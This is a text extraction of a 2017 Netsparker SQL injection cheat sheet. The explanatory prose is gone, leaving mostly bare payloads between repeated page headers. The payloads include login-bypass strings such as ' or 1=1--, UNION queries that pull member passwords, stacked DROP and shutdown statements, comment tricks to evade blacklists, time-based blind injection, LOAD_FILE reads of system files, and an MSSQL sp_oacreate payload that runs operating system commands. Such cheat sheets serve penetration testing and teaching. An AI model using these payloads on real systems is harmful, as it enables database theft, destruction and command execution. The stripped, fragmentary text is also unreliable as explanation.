SQL Injection Cheat Sheet - Netsparker
SQL Injection Cheat Sheet - Netsparker
1 de 21 21/11/2017 01:13 p. m.
SQL Injection Cheat Sheet | Netsparker https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/...
2 de 21 21/11/2017 01:13 p. m.
SQL Injection Cheat Sheet | Netsparker https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/...
--
DROP sampletable;--
#
DROP sampletable;#
admin'--
/*Comment Here*/
DROP/*comment*/sampletable
DR/**/OP/*bypass blacklisting*/sampletable
SELECT/*avoid-spaces*/password/**/FROM/**/Members
3 de 21 21/11/2017 01:13 p. m.
SQL Injection Cheat Sheet | Netsparker https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/...
10
;
SELECT * FROM members; DROP members--
10;DROP members --
IF(condition,true-part,false-part)
4 de 21 21/11/2017 01:13 p. m.
SQL Injection Cheat Sheet | Netsparker https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/...
SELECT IF(1=1,'true','false')
BEGIN
IF condition THEN true-part; ELSE false-part; END IF; END;
IF (1=1) THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF;
END;
0xHEXNUMBER
SELECT CHAR(0x66)
SELECT 0x5045
SELECT 0x50 + 0x45
+
SELECT login + '-' + password FROM members
||
SELECT login || '-' || password FROM members
CONCAT()
5 de 21 21/11/2017 01:13 p. m.
SQL Injection Cheat Sheet | Netsparker https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/...
CHAR() CONCAT()
0x457578
SELECT 0x457578
SELECT CONCAT('0x',HEX('c:\\boot.ini'))
CONCAT()
SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77))
SELECT CHAR(75)+CHAR(76)+CHAR(77)
SELECT CHR(75)||CHR(76)||CHR(77)
SELECT (CHaR(75)||CHaR(76)||CHaR(77))
SELECT LOAD_FILE(0x633A5C626F6F742E696E69)
ASCII()
SELECT ASCII('a')
CHAR()
SELECT CHAR(64)
SELECT header, txt FROM news UNION ALL SELECT name, pass FROM members
6 de 21 21/11/2017 01:13 p. m.
SQL Injection Cheat Sheet | Netsparker https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/...
Hex()
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
7 de 21 21/11/2017 01:13 p. m.
SQL Injection Cheat Sheet | Netsparker https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/...
81dc9bdb52d04dc20036dbd8313ed055 = MD5(1234)
HAVING 1=1 --
ORDER BY 1--
ORDER BY 2--
ORDER BY N--
8 de 21 21/11/2017 01:13 p. m.
SQL Injection Cheat Sheet | Netsparker https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/...
9 de 21 21/11/2017 01:13 p. m.
SQL Injection Cheat Sheet | Netsparker https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/...
declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'notepad.exe'
Username: '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec
sp_oamethod @o, 'run', NULL, 'notepad.exe' --
master..sysmessages
master..sysservers
masters..sysxlogins
sys.sql_logins
10 de 21 21/11/2017 01:13 p. m.
SQL Injection Cheat Sheet | Netsparker https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/...
11 de 21 21/11/2017 01:13 p. m.
SQL Injection Cheat Sheet | Netsparker https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/...
SELECT id, product FROM test.test t LIMIT 0,0 UNION ALL SELECT 1,'x'/*,10
;
';shutdown --
12 de 21 21/11/2017 01:13 p. m.
SQL Injection Cheat Sheet | Netsparker https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/...
13 de 21 21/11/2017 01:13 p. m.
SQL Injection Cheat Sheet | Netsparker https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/...
14 de 21 21/11/2017 01:13 p. m.
SQL Injection Cheat Sheet | Netsparker https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/...
15 de 21 21/11/2017 01:13 p. m.
SQL Injection Cheat Sheet | Netsparker https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/...
BENCHMARK(howmanytimes, do this)
SELECT pg_sleep(10);
SELECT sleep(10);
16 de 21 21/11/2017 01:13 p. m.
SQL Injection Cheat Sheet | Netsparker https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/...
product.asp?id=4 (SMO)
product.asp?id=5-1
product.asp?id=4 OR 1=1
product.asp?name=Book
product.asp?name=Bo'%2b'ok
product.asp?name=Book' OR 'x'='x
select LockWorkStation();
select exitprocess();
SELECT USER();
query.php?user=1+union+select+load_file(0x63...),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
17 de 21 21/11/2017 01:13 p. m.
SQL Injection Cheat Sheet | Netsparker https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/...
query.php?user=1+union+select+benchmark(500000,sha1
(0x414141)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
MD5()
SHA1()
PASSWORD()
ENCODE()
COMPRESS()
ROW_COUNT()
SCHEMA()
VERSION()
@@version
18 de 21 21/11/2017 01:13 p. m.
SQL Injection Cheat Sheet | Netsparker https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/...
19 de 21 21/11/2017 01:13 p. m.
SQL Injection Cheat Sheet | Netsparker https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/...
20 de 21 21/11/2017 01:13 p. m.
SQL Injection Cheat Sheet | Netsparker https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/...
21 de 21 21/11/2017 01:13 p. m.